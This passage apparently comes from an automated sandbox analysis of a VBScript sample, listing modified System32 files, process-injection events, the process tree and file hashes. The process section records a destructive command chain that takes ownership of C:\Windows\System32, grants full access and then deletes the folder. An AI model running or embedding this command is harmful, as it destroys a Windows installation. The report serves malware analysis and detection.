| File opened for modification | C:\Windows\System32\winevt\Logs\MIA934~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\mprapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI03A7~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\BFE.DLL | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\bitsigd.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\thumbcache.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\secur32.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UIAnimation.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll | C:\Windows\System32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1320 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 1320 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 1320 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2412 wrote to memory of 2824 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe |
| PID 2412 wrote to memory of 2824 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe |
| PID 2412 wrote to memory of 2824 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe |
| PID 2412 wrote to memory of 2516 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe |
| PID 2412 wrote to memory of 2516 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe |
| PID 2412 wrote to memory of 2516 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32 /r /d y
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant administrators:F /t
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T
Network
N/A
Files
\Windows\System32\advapi32.dll
| MD5 | 6df46d2bd74e3da1b45f08f10d172732 |
| SHA1 | 3491f8f9a73c00b158e43a530210d67a4f0598ae |
| SHA256 | 2dc945f6f2c4a82189bc7da2fcbb7d9a0e2588a909539249e55ba82468e0c677 |
| SHA512 | 648d07a7bec83f45629d34defde0421f449998f3a290cca2ff3941ef2f551ce508c204cb2e0ba02c6b79dfcf7a7c2f2ac3056f286ca63d31e033db7c524f9abb |
\Windows\System32\cryptbase.dll
| MD5 | 784fa3df338e2e8f5f0389d6fac428af |
| SHA1 | 6d32c67c91c6d374854e907c6719db2538540867 |
| SHA256 | 9c8aa0cfdeb9e38aaf8eb08626070e0f0364f4f8a793cfe3532ec6c007980c34 |
| SHA512 | a147e689c6fcca7bab690aec17deef74d6935338cd159bcb10acc2ad76841e6abbd9290ac17e2f5b5ec3422823a1e716e7cd5c5a1b950937c5295e14b68ac53c |
\Windows\System32\clbcatq.dll
| MD5 | 25983de69b57142039ac8d95e71cd9c9 |
| SHA1 | 01691e3b0bfa569e64bdb7dc3d637a867ed2dc08 |
| SHA256 | a677da7ebcbcb6073d27e8a38809f51e971e83ed379bc599aaad6ef4216348da |
| SHA512 | dfd22fb0570e3c1caf908305f04aec9c7cbe8332f6d6409b8c724baca523354c93bc240bf6d7944c892a4fc221c099d5fbf0b9526a9d9bb7c13ba367e876afec |
\Windows\System32\cryptsp.dll
| MD5 | d0c2fbb6d97416b0166478fc7ae2b212 |
| SHA1 | e290bdf2312ac30a4e9f2a96d7c84714eee84899 |
| SHA256 | 7eab6c37f0a845e645ca44cc060ac6c56e386c7ef7a64716c6786c9602ad8c9d |
| SHA512 | ee3cc1a1b21a0ee16532dfc0713f1b369414f521937e44851ba338eaf188109779b9b615ce37bf4cff572a9484d99d9a36184b9120cf4990fc2d2791ed680e87 |
\Windows\System32\imageres.dll
| MD5 | 5aa945234e9d4cce4f715276b9aa712c |
| SHA1 | dba3c8cecb3f8d4b1d96265d8519dbe0e911f446 |
| SHA256 | 65165bd131056816f009d987fc78ac86ffe0c3c38a27e73f873586b7ff4d59cf |
| SHA512 | acf0d5706662b3f4abb68b94aad9155c17dc74ccf3a92ed97c9bc2abdf4f8fd32705bb7692836452304301605561121b4ef2b82b81563f9bf2a9d1c71e8c6233 |
\Windows\System32\wscript.exe
| MD5 | 8886e0697b0a93c521f99099ef643450 |
| SHA1 | 851bd390bf559e702b8323062dbeb251d9f2f6f7 |
| SHA256 | d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f |
| SHA512 | fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837 |